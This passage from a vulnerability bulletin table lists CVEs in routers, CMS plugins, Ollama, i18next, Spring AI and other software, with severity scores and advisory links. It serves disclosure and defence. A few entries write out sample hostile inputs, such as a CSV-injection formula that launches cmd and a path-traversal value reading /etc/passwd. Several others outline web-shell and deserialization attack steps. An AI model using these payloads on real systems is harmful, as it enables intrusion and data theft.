| 9.3 | CVE-2026-7161 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-VMS V20.0.2 | A stack overflow vulnerability exists in the WebCam Server Login functionality of GeoVision GV-VMS V20 20.0.2. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. Stack overflow via unconstrained sscanf: The call to `sscanf` at [1] to split the `Buffer` variable into the `username` and `password` variables doesn't limit the size of the extracted content to match the destination buffers' sizes. In this case, if either the username or password decoded from the authorization string exceeds `40` characters (the size of the stack variables `username` and `password`) then a stack overflow will occur. The data is controlled by an attacker, but stronger constraints (e.g. no null bytes) may make exploitation harder. A successful attack could lead to full code execution as SYSTEM on the machine running the service. | 2026-05-04 | 9 | CVE-2026-7372 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| Yarbo--Firmware | Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them. | 2026-05-07 | 9.8 | CVE-2026-7414 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000 |
| Yarbo--Firmware | The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind. | 2026-05-07 | 9.8 | CVE-2026-7415 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111100111111111110000000000000000000000000000000000000000000000000000001001 |
| ollama--ollama | Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint accepts an attacker-supplied GGUF file in which the declared tensor offset and size exceed the file's actual length; during quantization in fs/ggml/gguf.go and server/quantization.go (WriteTo()), the server reads past the allocated heap buffer. The leaked memory contents may include environment variables, API keys, system prompts, and concurrent users' conversation data, and can be exfiltrated by uploading the resulting model artifact through the /api/push endpoint to an attacker-controlled registry. The /api/create and /api/push endpoints have no authentication in the upstream distribution. Default deployments bind to 127.0.0.1, but the documented OLLAMA_HOST=0.0.0.0 configuration is widely used in practice (large public-internet exposure observed). | 2026-05-04 | 9.1 | CVE-2026-7482 | ollama/ollama PR #14406 — ggml: ensure tensor size is valid (fix) Fix commit 88d57d0 ollama v0.17.1 release notes |
| Totolink--WA300 | A security flaw has been discovered in Totolink WA300 5.2cu.7112_B20190227. The affected element is the function loginauth of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument http_host results in a buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-04 | 9.8 | CVE-2026-7719 | VDB-360895 \| Totolink WA300 POST Request cstecgi.cgi loginauth buffer overflow VDB-360895 \| CTI Indicators (IOB, IOC, IOA) Submit #807197 \| Totolink WA300 WA300 V5.2cu.7112_B20190227 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-loginAuth-34553a41781f8050b8ffc9e90a103cd5 https://www.totolink.net/ |
| Totolink--N300RH | A security flaw has been discovered in Totolink N300RH 3.2.4-B20220812. Affected by this vulnerability is the function loginauth of the file /cgi-bin/cstecgi.cgi of the component Parameter Handler. Performing a manipulation of the argument Password results in a buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-04 | 9.8 | CVE-2026-7747 | VDB-360922 \| Totolink N300RH Parameter cstecgi.cgi loginauth buffer overflow VDB-360922 \| CTI Indicators (IOB, IOC, IOA) Submit #807201 \| Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-loginauth_password-34553a41781f80c0ad36f4d95122fd40?pvs=73 https://www.totolink.net/ |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setAppFilterCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument enable results in OS command injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-05 | 9.8 | CVE-2026-7823 | VDB-361075 \| Totolink A8000RU cstecgi.cgi setAppFilterCfg os command injection VDB-361075 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #807775 \| Totolink A8000RU 7.1cu.643_b20200521 Command Injection https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_330/README.md https://www.totolink.net/ |
| EFM--ipTIME NAS1dual | A security vulnerability has been detected in EFM ipTIME NAS1dual 1.5.24. This issue affects the function get_csrf_whites of the file /cgi/advanced/misc_main.cgi. Such manipulation leads to a stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-05 | 9.8 | CVE-2026-7834 | VDB-361113 \| EFM ipTIME NAS1dual misc_main.cgi get_csrf_whites stack-based overflow VDB-361113 \| CTI Indicators (IOB, IOC, IOA) Submit #807787 \| iptime nas1dual 1.5.24 Stack Overflow https://github.com/glkfc/IoT-Vulnerability/blob/main/iptime/nas1dual/iptime2_en.md |
| D-Link--DI-8100 | A weakness has been identified in D-Link DI-8100 16.07.26A1. Affected is the function sprintf of the file /auto_reboot.asp of the component HTTP Handler. This manipulation of the argument enable/time causes a buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-05 | 9.8 | CVE-2026-7853 | VDB-361130 \| D-Link DI-8100 HTTP auto_reboot.asp sprintf buffer overflow VDB-361130 \| CTI Indicators (IOB, IOC, IOA) Submit #807837 \| D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/auto_reboot_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A security vulnerability has been detected in D-Link DI-8100 16.07.26A1. Affected by this vulnerability is the function url_rule_asp of the file /url_rule.asp of the component POST Parameter Handler. Such manipulation leads to a buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-05 | 9.8 | CVE-2026-7854 | VDB-361131 \| D-Link DI-8100 POST Parameter url_rule.asp url_rule_asp buffer overflow VDB-361131 \| CTI Indicators (IOB, IOC, IOA) Submit #807838 \| D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/url_rule_asp_overflow.md https://www.dlink.com/ |
| Universal Robots--PolyScope 5 | OS command injection in the Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows an unauthenticated attacker to craft commands that will execute code on the robot's OS. | 2026-05-08 | 9.8 | CVE-2026-8153 | https://www.universal-robots.com/developer/communication-protocol/dashboard-server/ |
| opencartextensions--Extension TMD Vendor System | Opencart TMD Vendor System 3.x contains a blind SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the product_id parameter. Attackers can craft malicious SQL queries using time-based or content-based blind injection techniques to enumerate usernames, emails, and password reset codes from the oc_user table. | 2026-05-10 | 8.2 | CVE-2021-47928 | ExploitDB-50493 Official Product Homepage Product Reference VulnCheck Advisory: Opencart TMD Vendor System 3.x Blind SQL Injection via product route |
| Balbooa--Balbooa Joomla Forms Builder | Balbooa Joomla Forms Builder 2.0.6 contains an unauthenticated SQL injection vulnerability in the form submission handler that allows remote attackers to execute arbitrary SQL queries. Attackers can send POST requests to the com_baforms component with malicious JSON payloads in the 'id' field parameter to extract sensitive database information. | 2026-05-10 | 8.2 | CVE-2021-47930 | ExploitDB-50447 Official Product Homepage VulnCheck Advisory: Balbooa Joomla Forms Builder 2.0.6 SQL Injection Unauthenticated |
| Sentry--Sentry | Sentry 8.2.0 contains a remote code execution vulnerability that allows authenticated superusers to execute arbitrary commands by injecting malicious pickle-serialized objects through the audit log entry data parameter. Attackers can submit crafted POST requests to the admin audit log endpoint with base64-encoded compressed pickle payloads in the data field to achieve code execution with application privileges. | 2026-05-10 | 8.8 | CVE-2021-47935 | ExploitDB-50318 Product Reference VulnCheck Advisory: Sentry 8.2.0 Remote Code Execution via Pickle Deserialization |
| E107--e107 CMS | e107 CMS 2.3.0 contains a remote code execution vulnerability that allows authenticated users with theme installation permissions to execute arbitrary commands by uploading malicious theme files. Attackers can upload a crafted theme package through the theme.php endpoint that deploys a web shell to the e107_themes directory, then execute system commands via the payload.php script. | 2026-05-10 | 8.8 | CVE-2021-47937 | ExploitDB-50315 Official Product Homepage Product Reference VulnCheck Advisory: e107 CMS 2.3.0 Authenticated Remote Code Execution via Theme Upload |
| Impresscms--ImpressCMS | ImpressCMS 1.4.2 contains a remote code execution vulnerability in the autotasks administrative interface that allows authenticated attackers to execute arbitrary PHP code by injecting malicious code into the sat_code parameter. Attackers can authenticate, submit a POST request to /modules/system/admin.php?fct=autotasks&op=mod with crafted sat_code containing PHP commands, which creates an executable file that accepts arbitrary commands via GET parameters. | 2026-05-10 | 8.8 | CVE-2021-47938 | ExploitDB-50298 Official Product Homepage Product Reference VulnCheck Advisory: ImpressCMS 1.4.2 Remote Code Execution via Autotasks |
| Evo--Evolution CMS | Evolution CMS 3.1.6 contains a remote code execution vulnerability that allows authenticated users with module creation permissions to execute arbitrary system commands by injecting PHP code into module parameters. Attackers can send POST requests to /manager/index.php with malicious PHP code in the 'post' parameter to create modules that execute arbitrary commands when invoked. | 2026-05-10 | 8.8 | CVE-2021-47939 | ExploitDB-50296 Official Product Homepage Product Reference VulnCheck Advisory: Evolution CMS 3.1.6 Authenticated Remote Code Execution via Module Creation |
| Modalsurvey--Survey & Poll | WordPress Plugin Survey & Poll 1.5.7.3 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wp_sap cookie parameter. Attackers can craft SQL payloads in the cookie to extract sensitive database information including usernames, passwords, and other confidential data from the WordPress database. | 2026-05-10 | 8.2 | CVE-2021-47941 | ExploitDB-50269 Official Product Homepage VulnCheck Advisory: WordPress Plugin Survey & Poll 1.5.7.3 SQL Injection via sss_params |
| Textpattern--TextPattern CMS | TextPattern CMS 4.8.7 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by uploading malicious PHP files through the file upload functionality. Attackers can upload a PHP shell via the Files section in the content area and execute commands by accessing the uploaded file at /textpattern/files/ with GET parameters passed to the system function. | 2026-05-10 | 8.8 | CVE-2021-47943 | ExploitDB-49996 ExploitDB-50415 VulnCheck Advisory: TextPattern CMS 4.8.7 Remote Code Execution via File Upload |
| Cyberpanel--CyberPanel | CyberPanel 2.1 contains a command execution vulnerability that allows authenticated attackers to read arbitrary files and execute remote code by exploiting symlink attacks through the filemanager controller endpoint. Attackers can manipulate the completeStartingPath parameter in POST requests to /filemanager/controller to create symbolic links, read sensitive files like database credentials, and execute arbitrary shell commands through the /websites/fetchFolderDetails endpoint. | 2026-05-10 | 8.8 | CVE-2021-47949 | ExploitDB-50230 Official Product Homepage Product Reference VulnCheck Advisory: CyberPanel 2.1 Authenticated Remote Code Execution via Symlink Attack |
| MegaTKC--Aero CMS | Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server. | 2026-05-10 | 8.8 | CVE-2022-50944 | ExploitDB-51085 Official Product Homepage VulnCheck Advisory: Aero CMS 0.0.1 PHP Code Injection via posts.php |
| DrayTek--Vigor 2960 | DrayTek Vigor 2960 firmware versions prior to 1.5.1.4 contain an OS command injection vulnerability in the CGI login handler that allows unauthenticated remote attackers to execute arbitrary commands by injecting shell metacharacters into the formpassword parameter. Attackers can exploit unsanitized input passed to the otp_check.sh script to achieve remote code execution with web server privileges. Exploitation requires knowledge of a valid username and that the target account has MOTP authentication enabled. | 2026-05-08 | 8.1 | CVE-2022-50994 | https://www.draytek.co.uk/support/downloads/vigor-2960/older-firmware/firmware-1514?task=download.send&id=2597:readme-v2960-1514&catid=1251 https://www.draytek.com/about/newsroom/2021/2021/end-of-life-notification-vigor2960 https://www.vulncheck.com/advisories/draytek-vigor-2960-os-command-injection-via-mainfunction-cgi |
| Erpnext--Frappe Framework (ERPNext) | Frappe Framework ERPNext 13.4.0 contains a sandbox escape vulnerability in RestrictedPython that allows authenticated users with System Manager role to execute arbitrary code by exploiting frame introspection. Attackers can create a server script via the /app/server-script endpoint and access the gi_frame attribute to traverse the call stack and invoke os.popen to execute system commands. | 2026-05-05 | 8.8 | CVE-2023-54345 | ExploitDB-51580 Official Product Homepage Product Reference Reference Source Code Repository Reference Source Code Repository VulnCheck Advisory: Frappe Framework ERPNext 13.4.0 Remote Code Execution |
| Rajodiya--ERPGo SaaS | ERPGo SaaS 3.9 contains a CSV injection vulnerability that allows authenticated attackers to execute arbitrary code by injecting formula payloads into vendor name fields. Attackers can add malicious formulas like =10+20+cmd|' /C calc'!A0 in the vendor creation form, which execute when the exported CSV file is opened in spreadsheet applications. | 2026-05-05 | 8.8 | CVE-2023-54348 | ExploitDB-51220 Official Product Homepage Product Reference VulnCheck Advisory: ERPGo SaaS 3.9 CSV Injection via Vendor Creation |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions, and may result in exposure of sensitive data or unauthorized system modifications. | 2026-05-06 | 8.3 | CVE-2024-30151 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127782 |
| PHOENIX CONTACT--FL MGUARD 2102 | A low privileged remote attacker can gain the root password due to improper removal of sensitive information before storage or transfer. | 2026-05-07 | 8 | CVE-2024-43384 | https://certvde.com/en/advisories/VDE-2024-039 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improperly controlled modification of dynamically-determined object attributes and allocation of resources without limits or throttling in DivvyDrive Information Technologies Inc. DivvyDrive allow excessive allocation and flooding. This issue affects DivvyDrive: from 4.8.2.19 before 4.8.3.2. | 2026-05-07 | 8.3 | CVE-2025-14341 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| Hitachi--Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900 | Remote Code Execution Vulnerability in Hitachi Storage Navigator and the maintenance console in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28. This issue affects Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28 : before DKCMAIN Ver. 88-08-16-xx/00, SVP Ver. 88-08-18-xx/00, before DKCMAIN Ver. 93-07-26-xx/00, SVP Ver. 93-07-26-xx/00, before DKCMAIN Ver. A3-04-02-xx/00, MPC Ver. A3-04-02-xx/00, before DKCMAIN Ver. A3-03-41-xx/00, MPC Ver. A3-03-41-xx/00, before DKCMAIN Ver. A3-03-03-xx/00, MPC Ver. A3-03-03-xx/00. | 2026-05-07 | 8.3 | CVE-2025-1978 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_307.html |
| HCL--BigFix RunBookAI | HCL BigFix RunBookAI is affected by an Unvalidated Command Input / Potential Command Smuggling vulnerability. A flaw in a component's input handling was identified that could permit unauthorized command execution. | 2026-05-06 | 8.8 | CVE-2025-31951 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130444 |
| Gen Digital--Norton Secure VPN | A privilege escalation vulnerability exists during the installation of Norton Secure VPN via the Microsoft Store. A low-privilege user can replace files during the installation process, which may result in deletion of arbitrary files that can lead to elevation of privileges. | 2026-05-04 | 8.8 | CVE-2025-58074 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2276 |
| Apache Software Foundation--Apache CloudStack | Missing MinIO policy cleanup on bucket deletion via Apache CloudStack allows users to retain access to buckets which they previously owned. If another user creates a new bucket with the same name, the previous owners can gain unauthorized read and write access to it by using the previously generated access and secret keys. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | 8 | CVE-2025-66467 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Hitachi--Hitachi Virtual Storage Platform One Block 23 | OS command injection vulnerability in the management GUI (maintenance utility) of Hitachi Virtual Storage Platform One Block 23, 24, 26 and 28. This issue affects Hitachi Virtual Storage Platform One Block 23/24/26/28: before DKCMAIN A3-04-21-40/00, ESM A3-04-21/00. | 2026-05-07 | 8.1 | CVE-2025-9661 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_309.html |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to execute arbitrary code as root, possibly resulting in the complete compromise of a targeted device. To exploit this vulnerability, the attacker must have valid user credentials on the affected device. | 2026-05-06 | 8.8 | CVE-2026-20034 | cisco-sa-unity-rce-ssrf-hENhuASy |
| vda-linux--busybox_mirror | BusyBox before commit 42202bf contains a heap buffer overflow vulnerability in the DHCPv6 client (udhcpc6) DNS_SERVERS option handler in networking/udhcp/d6_dhcpc.c that allows network-adjacent attackers to trigger memory corruption by sending a crafted DHCPv6 response with a malformed D6_OPT_DNS_SERVERS option. Attackers can exploit incorrect heap buffer allocation calculations in the option_to_env() function to cause denial of service or achieve arbitrary code execution on embedded systems without heap hardening. | 2026-05-04 | 8.1 | CVE-2026-29004 | https://y637f9qq2x.com/posts/busybox-dhcpv6-heap-overflow/ https://github.com/vda-linux/busybox_mirror/commit/42202bfb1e6ac51fa995beda8be4d7b654aeee2a https://github.com/vda-linux/busybox_mirror/commit/d368f3f7836d1c2484c8f839316e5c93e76d4409 https://busybox.net/ https://www.vulncheck.com/advisories/busybox-dhcpv6-client-heap-buffer-overflow-via-dns-servers |
| netbox-community--netbox | NetBox versions 4.3.5 through 4.5.4 contain a remote code execution vulnerability in the RenderTemplateMixin.get_environment_params() method that allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary code by specifying malicious Python callables in the environment_params field. Attackers can bypass Jinja2 SandboxedEnvironment protections by setting the finalize parameter to any importable Python callable such as subprocess.getoutput, which is invoked on every rendered expression outside the sandbox's call interception mechanism, achieving remote code execution as the NetBox service user. | 2026-05-04 | 8.8 | CVE-2026-29514 | https://chocapikk.com/posts/2026/netbox-export-template-rce/ https://github.com/netbox-community/netbox/issues/22079 https://github.com/netbox-community/netbox/pull/22078 https://www.vulncheck.com/advisories/netbox-rce-via-rendertemplatemixin |
| Microsoft--Azure Machine Learning | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 8.8 | CVE-2026-32207 | Azure Machine Learning Notebook Spoofing Vulnerability |
| Microsoft--Microsoft Partner Center | Externally controlled reference to a resource in another sphere in Microsoft Partner Center allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 8.2 | CVE-2026-34327 | Microsoft Partner Center Spoofing Vulnerability |
| Oracle Corporation--Oracle MCP Server Helper Tool product of Oracle Open Source Projects | Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). Supported versions that are affected are 1.0.1 through 1.0.156. Easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL. | 2026-05-05 | 8.7 | CVE-2026-35228 | Oracle Advisory |
| Microsoft--Azure AI Foundry | Improper access control in Azure AI Foundry M365 published agents allows an unauthorized attacker to elevate privileges over a network. | 2026-05-07 | 8.6 | CVE-2026-35435 | Azure AI Foundry Elevation of Privilege Vulnerability |
| Gosoft Software Industry and Trade Ltd. Co.--Proticaret E-Commerce | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gosoft Software Industry and Trade Ltd. Co. Proticaret E-Commerce allows reflected cross-site scripting (XSS). This issue affects Proticaret E-Commerce: from v5.0.0 before V 6.0.1767.1383. | 2026-05-07 | 8.8 | CVE-2026-3953 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0180 |
| Microsoft--Azure Monitor Action Group notification system | Server-side request forgery (SSRF) in Azure Notification Service allows an authorized attacker to elevate privileges over a network. | 2026-05-07 | 8.1 | CVE-2026-41105 | Azure Monitor Action Group Notification System Elevation of Privilege Vulnerability |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, there is an integer overflow in ImageChannel::resize that leads to heap OOB write via OpenEXRUtil public API. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | 8.8 | CVE-2026-41142 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-m25w-72cj-q6mg https://github.com/AcademySoftwareFoundation/openexr/pull/2367 https://github.com/AcademySoftwareFoundation/openexr/commit/0592ee539f33c122c90f09238579b902d838afb4 |
| YesWiki--yeswiki | YesWiki is a wiki system written in PHP. Prior to version 4.6.1, YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization. This issue has been patched in version 4.6.1. | 2026-05-07 | 8.8 | CVE-2026-41143 | https://github.com/YesWiki/yeswiki/security/advisories/GHSA-f58v-p6j9-24c2 https://github.com/YesWiki/yeswiki/releases/tag/v4.6.1 |
| daptin--daptin | Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() - a raw SQL literal expression builder - without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4. | 2026-05-07 | 8.3 | CVE-2026-41422 | https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv https://github.com/daptin/daptin/releases/tag/v0.11.4 |
| dagster-io--dagster | Dagster is an orchestration platform for the development, production, and observation of data assets. Prior to Dagster Core version 1.13.1 and prior to Dagster libraries version 0.29.1, the DuckDB, Snowflake, BigQuery, and DeltaLake I/O managers constructed SQL WHERE clauses by interpolating dynamic partition key values into queries without escaping. A user with the Add Dynamic Partitions permission could create a partition key that injects arbitrary SQL, which would execute against the target database backend under the I/O manager's credentials. Only deployments that use dynamic partitions are affected. Pipelines using static or time-window partitions are not impacted. This issue has been patched in Dagster Core version 1.13.1 and Dagster libraries version 0.29.1. | 2026-05-07 | 8.3 | CVE-2026-41490 | https://github.com/dagster-io/dagster/security/advisories/GHSA-mjw2-v2hm-wj34 https://github.com/dagster-io/dagster/releases/tag/1.13.1 |
| dapr--dapr | Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. From versions 1.3.0 to before 1.15.14, 1.16.0-rc.1 to before 1.16.14, and 1.17.0-rc.1 to before 1.17.5, a vulnerability has been found in Dapr that allows bypassing access control policies for service invocation using reserved URL characters and path traversal sequences in method paths. The ACL normalized the method path independently from the dispatch layer, so the ACL evaluated one path while the target application received a different one. This issue has been patched in versions 1.15.14, 1.16.14, and 1.17.5. | 2026-05-08 | 8.1 | CVE-2026-41491 | https://github.com/dapr/dapr/security/advisories/GHSA-85gx-3qv6-4463 https://github.com/dapr/dapr/pull/9589 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.9 and praisonaiagents version 1.6.9, the fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends - MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB - pass table_prefix straight into f-string SQL. The root cause, code pattern and exploitation are the same, with 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter that is used directly in DDL. This issue has been patched in praisonai version 4.6.9 and praisonaiagents version 1.6.9. | 2026-05-08 | 8.1 | CVE-2026-41496 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit 2f68e16, RELATE is vulnerable to predictable token generation in auth.py's make_sign_in_key() function and exam.py's gen_ticket_code() function. This issue has been patched via commit 2f68e16. | 2026-05-07 | 8.7 | CVE-2026-41505 | https://github.com/inducer/relate/security/advisories/GHSA-rvx5-95mm-p77v https://github.com/inducer/relate/commit/2f68e16cd3b96d25c188c1aa3f7e13cdb15cdaeb |
| Ajax30--BraveCMS-2.0 | Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603. | 2026-05-08 | 8.7 | CVE-2026-41524 | https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433 https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the smc_require_auth_signed configuration option is completely ineffective - unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones. This issue has been patched in version 5.0.9. | 2026-05-07 | 8.2 | CVE-2026-41669 | https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the SAML IdP implementation in Admidio's SSO module uses the AssertionConsumerServiceURL value directly from incoming SAML AuthnRequest messages as the destination for the SAML response, without validating it against the registered ACS URL (smc_acs_url) stored in the database for the corresponding service provider client. An attacker who knows the Entity ID of a registered SP client can craft a SAML AuthnRequest with an arbitrary AssertionConsumerServiceURL, causing the IdP to send the signed SAML response -- containing user identity attributes (login name, email, roles, profile fields) -- to an attacker-controlled URL. This issue has been patched in version 5.0.9. | 2026-05-07 | 8.2 | CVE-2026-41670 | https://github.com/Admidio/admidio/security/advisories/GHSA-p9w9-87c8-m235 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| i18next--i18next-http-middleware | i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware wrote user-controlled language values into the Content-Language response header after passing them through utils.escape(), which is an HTML-entity encoder that does not strip carriage return, line feed, or other control characters. When the application used an older i18next (< 19.5.0) that still exercised the backward-compatibility fallback at LanguageDetector.js:100 or otherwise produced a raw detected value, CRLF sequences in the attacker-controlled lng parameter reached res.setHeader('Content-Language', ...) verbatim. This issue has been patched in version 3.9.3. | 2026-05-08 | 8.6 | CVE-2026-41683 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg |
| i18next--i18next-http-middleware | i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. This can break authorisation checks (if (user.isAdmin) returning true for any user), cause type-confusion DoS, and depending on downstream code it can be chained into RCE. | 2026-05-08 | 8.6 | CVE-2026-41690 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw |
| i18next--i18next-fs-backend | i18next-fs-backend is a backend layer for i18next used in Node.js and Deno to load translations from the filesystem. Prior to version 2.6.4, i18next-fs-backend substitutes the lng and ns options directly into the configured loadPath / addPath templates and then reads / writes the resulting file on disk. The interpolation is unencoded and unvalidated, so a crafted lng or ns value - containing .., a path separator, a control character, a prototype key, or simply an unexpectedly long string - allows an attacker who can influence either value to read or overwrite files outside the intended locale directory. When lng / ns are derived from untrusted input (request-scoped i18next instances behind an HTTP layer such as i18next-http-middleware, or any framework that lets the end user pick the language via query string, cookie, or header), a single request such as ?lng=../../../../etc/passwd causes the backend to attempt to read that path. This issue has been patched in version 2.6.4. | 2026-05-08 | 8.2 | CVE-2026-41693 | https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj |
| Spring--Spring AI | Spring AI's MilvusVectorStore#doDelete(List) implementation is vulnerable to filter-expression injection via unsanitized document IDs. Spring AI 1.0.x: affected from 1.0.0 through latest 1.0.x; upgrade to 1.0.7 or greater. Spring AI 1.1.x: affected from 1.1.0 through latest 1.1.x; upgrade to 1.1.6 or greater. | 2026-05-09 | 8.6 | CVE-2026-41705 | https://spring.io/security/cve-2026-41705 |
